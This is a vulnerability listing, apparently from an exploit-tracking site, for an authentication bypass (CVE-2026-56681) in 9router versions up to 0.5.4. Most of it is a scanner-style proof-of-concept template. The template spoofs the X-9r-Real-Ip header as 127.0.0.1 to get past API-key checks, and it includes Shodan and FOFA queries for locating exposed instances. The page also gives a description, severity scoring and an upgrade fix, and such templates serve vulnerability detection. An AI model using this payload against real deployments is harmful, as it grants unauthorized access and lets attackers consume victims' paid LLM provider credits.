CVE-2026-56681: 9router <=0.5.4 - Authentication Bypass

2026-09-28 Unknown PoC Public

Description

9Router prior to 0.5.6 contains an authentication bypass caused by trusting client-supplied X-9r-Real-Ip header in src/dashboardGuard.js, letting remote unauthenticated attackers access local API routes and consume resources, exploit requires bypassing API-key validation via header manipulation.

PoC

id: CVE-2026-56681

info:
  name: 9router <=0.5.4 - Authentication Bypass
  author: 0x_Akoko
  severity: high
  description: |
    9Router prior to 0.5.6 contains an authentication bypass caused by trusting client-supplied X-9r-Real-Ip header in src/dashboardGuard.js, letting remote unauthenticated attackers access local API routes and consume resources, exploit requires bypassing API-key validation via header manipulation.
  impact: |
    Remote attackers can bypass API-key validation to use LLM providers, consume paid credits, and enumerate models without authorization.
  remediation: |
    Update to version 0.5.6 or later.
  reference:
    - https://github.com/advisories/GHSA-5mj8-gf6m-fhw8
    - https://github.com/decolua/9router/security/advisories/GHSA-5mj8-gf6m-fhw8
    - https://github.com/decolua/9router/commit/efd20be8d81ef2e256a7037f3aa78e6b567b5fd3
    - https://github.com/decolua/9router/releases/tag/v0.5.6
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2026-56681
    epss-score: 0.00968
    epss-percentile: 0.60324
    cwe-id: CWE-807
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.html:"9Router"
    fofa-query: body="9Router"
  tags: cve,cve2026,9router,auth-bypass,llm,unauth

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /api/v1/models HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        internal: true
        dsl:
          - 'status_code == 401'
          - 'contains(body, "API key required for remote API access")'
        condition: and

  - raw:
      - |
        GET /api/v1/models HTTP/1.1
        Host: {{Hostname}}
        X-9r-Real-Ip: 127.0.0.1

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "json")'
          - 'contains_all(body, "owned_by", "object", "data")'
        condition: and
# digest: 4a0a0047304502206e2bdbf73f977d8c31fc7f0069072be1f27b70e3e572995ead11d7792dd5ffc1022100fd951cbdfe252b0430752a148b9995aefbad5ba35e7d35f965c717416f335a3f:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.